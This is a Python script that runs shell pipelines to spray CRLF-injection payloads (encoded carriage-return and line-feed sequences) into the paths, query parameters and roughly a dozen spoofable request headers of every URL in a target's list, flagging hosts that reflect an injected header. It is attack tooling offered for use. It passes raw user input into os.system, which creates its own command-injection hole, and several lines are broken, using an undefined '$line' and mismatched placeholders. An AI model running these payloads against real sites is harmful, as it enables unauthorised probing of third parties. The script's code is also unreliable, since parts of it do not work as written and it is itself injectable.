from os import system

msg = input("Enter the target (bing.com): ")

# system('cat {}.txt | waybackurls > {}urls.txt')

system("cat " + msg + ".txt | httpx | rush -j40 'if curl -Iks -m 10 \"{}/%0D%0Acrlf:crlf\" | grep -q \"^crlf:crlf\" || curl -Iks -m 10 \"{}/%0d%0acrlf:crlf\" | grep -q \"^crlf:crlf\" || curl -Iks -m 10 \"{}/%E5%98%8D%E5%98%8Acrlf:crlf\" | grep -q \"^crlf:crlf\"; then echo \"The URL {} may be vulnerable to CRLF Injection. Check Manually\";fi'")
system("cat " + msg + "urls.txt | qsreplace \"%0d%0acrlf:crlf\" | rush -j40 'if curl -skI -m 10 \"{}\" | grep -q \"^crlf:crlf\"; then echo \"CRLF found on {}\"; fi'")
system("cat " + msg + "urls.txt | qsreplace \"%E5%98%8D%E5%98%8Acrlf:crlf\" | rush -j40 'if curl -skI -m 10 \"{}\" | grep -q \"^crlf:crlf\"; then echo \"CRLF found on {}\"; fi'")
system("cat " + msg + "urls.txt | qsreplace -a \"%0d%0acrlf:crlf\" | rush -j40 'if curl -skI -m 10 \"{}\" | grep -q \"^crlf:crlf\"; then echo \"CRLF found on {}\"; fi'")
system("cat " + msg + ".txt | httpx | rush -j40 'if curl -Iks -m 10 \"{}/%0D%0Acrlf:crlf\" -H \"CF-Connecting_IP: %0d%0acrlf:crlf\" -H \"From: root@%0d%0acrlf:crlf\" -H \"Client-IP: %0d%0acrlf:crlf\" -H \"X-Client-IP: %0d%0acrlf:crlf\" -H \"X-Forwarded-For: %0d%0acrlf:crlf\" -H \"X-Wap-Profile: %0d%0acrlf:crlf\" -H \"Forwarded: %0d%0acrlf:crlf\" -H \"True-Client-IP: %0d%0acrlf:crlf\" -H \"Contact: root@%0d%0acrlf:crlf\" -H \"X-Originating-IP: %0d%0acrlf:crlf\" -H \"X-Real-IP: %0d%0acrlf:crlf\" | grep -q \"^crlf:crlf\" || curl -Iks -m 10 \"$line\" -H \"CF-Connecting_IP: %E5%98%8D%E5%98%8Acrlf:crlf\" -H \"From: root@%E5%98%8D%E5%98%8Acrlf:crlf\" -H \"Client-IP: %E5%98%8D%E5%98%8Acrlf:crlf\" -H \"X-Client-IP: %E5%98%8D%E5%98%8Acrlf:crlf\" -H \"X-Forwarded-For: %E5%98%8D%E5%98%8Acrlf:crlf\" -H \"X-Wap-Profile: %E5%98%8D%E5%98%8Acrlf:crlf\" -H \"Forwarded: %E5%98%8D%E5%98%8Acrlf:crlf\" -H \"True-Client-IP: %E5%98%8D%E5%98%8Acrlf:crlf\" -H \"Contact: root@%E5%98%8D%E5%98%8Acrlf:crlf\" -H \"X-Originating-IP: %E5%98%8D%E5%98%8Acrlf:crlf\" -H \"X-Real-IP: %E5%98%8D%E5%98%8Acrlf:crlf\" | grep -q \"^crlf:crlf\" || curl -Iks -m 10 \"$line\" -H \"CF-Connecting_IP: %0D%0Acrlf:crlf\" -H \"From: root@%0D%0Acrlf:crlf\" -H \"Client-IP: %0D%0Acrlf:crlf\" -H \"X-Client-IP: %0D%0Acrlf:crlf\" -H \"X-Forwarded-For: %0D%0Acrlf:crlf\" -H \"X-Wap-Profile: %0D%0Acrlf:crlf\" -H \"Forwarded: %0D%0Acrlf:crlf\" -H \"True-Client-IP: %0D%0Acrlf:crlf\" -H \"Contact: root@%0D%0Acrlf:crlf\" -H \"X-Originating-IP: %0D%0Acrlf:crlf\" -H \"X-Real-IP: %0D%0Acrlf:crlf\" | grep -q \"^crlf:crlf\"; then echo \"The URL {} with vulnerable header may be vulnerable to CRLF Injection. Check Manually\";fi'")

# system('cat {}.txt| httpx | rush -j40 \'if curl -Iks -m 10 "{}/%0D%0Acrlf:crlf" | grep -q "^crlf:crlf" || curl -Iks -m 10 "{}/%0d%0acrlf:crlf" | grep -q "^crlf:crlf" || curl -Iks -m 10 "{}/%E5%98%8D%E5%98%8Acrlf:crlf" | grep -q "^crlf:crlf"; then echo "The URL {} may be vulnerable to CRLF Injection. Check Manually";fi\''.format(msg, msg, msg))
# system('cat {}urls.txt | qsreplace "%0d%0acrlf:crlf" | rush -j40 \'if curl -skI -m 10 "{}" | grep -q "^crlf:crlf"; then echo "CRLF found on {}"; fi\''.format(msg, msg, msg))
# system('cat {}urls.txt | qsreplace "%E5%98%8D%E5%98%8Acrlf:crlf" | rush -j40 \'if curl -skI -m 10 "{}" | grep -q "^crlf:crlf"; then echo "CRLF found on {}"; fi\''.format(msg, msg, msg))
# system('cat {}urls.txt | qsreplace -a "%0d%0acrlf:crlf" | rush -j40 \'if curl -skI -m 10 "{}" | grep -q "^crlf:crlf"; then echo "CRLF found on {}"; fi\''.format(msg, msg, msg))
# system('cat {}.txt | httpx | rush -j40 \'if curl -Iks -m 10 "{}" -H "CF-Connecting_IP: %0d%0acrlf:crlf" -H "From: root@%0d%0acrlf:crlf" -H "Client-IP: %0d%0acrlf:crlf" -H "X-Client-IP: %0d%0acrlf:crlf" -H "X-Forwarded-For: %0d%0acrlf:crlf" -H "X-Wap-Profile: %0d%0acrlf:crlf" -H "Forwarded: %0d%0acrlf:crlf" -H "True-Client-IP: %0d%0acrlf:crlf" -H "Contact: root@%0d%0acrlf:crlf" -H "X-Originating-IP: %0d%0acrlf:crlf" -H "X-Real-IP: %0d%0acrlf:crlf" | grep -q "^crlf:crlf" || curl -Iks -m 10 "$line" -H "CF-Connecting_IP: %E5%98%8D%E5%98%8Acrlf:crlf" -H "From: root@%E5%98%8D%E5%98%8Acrlf:crlf" -H "Client-IP: %E5%98%8D%E5%98%8Acrlf:crlf" -H "X-Client-IP: %E5%98%8D%E5%98%8Acrlf:crlf" -H "X-Forwarded-For: %E5%98%8D%E5%98%8Acrlf:crlf" -H "X-Wap-Profile: %E5%98%8D%E5%98%8Acrlf:crlf" -H "Forwarded: %E5%98%8D%E5%98%8Acrlf:crlf" -H "True-Client-IP: %E5%98%8D%E5%98%8Acrlf:crlf" -H "Contact: root@%E5%98%8D%E5%98%8Acrlf:crlf" -H "X-Originating-IP: %E5%98%8D%E5%98%8Acrlf:crlf" -H "X-Real-IP: %E5%98%8D%E5%98%8Acrlf:crlf" | grep -q "^crlf:crlf" || curl -Iks -m 10 "$line" -H "CF-Connecting_IP: %0D%0Acrlf:crlf" -H "From: root@%0D%0Acrlf:crlf" -H "Client-IP: %0D%0Acrlf:crlf" -H "X-Client-IP: %0D%0Acrlf:crlf" -H "X-Forwarded-For: %0D%0Acrlf:crlf" -H "X-Wap-Profile: %0D%0Acrlf:crlf" -H "Forwarded: %0D%0Acrlf:crlf" -H "True-Client-IP: %0D%0Acrlf:crlf" -H "Contact: root@%0D%0Acrlf:crlf" -H "X-Originating-IP: %0D%0Acrlf:crlf" -H "X-Real-IP: %0D%0Acrlf:crlf" | grep -q "^crlf:crlf"; then echo "The URL {} with vulnerable header may be vulnerable to CRLF Injection. Check Manually";fi\''.format(msg, msg, msg))
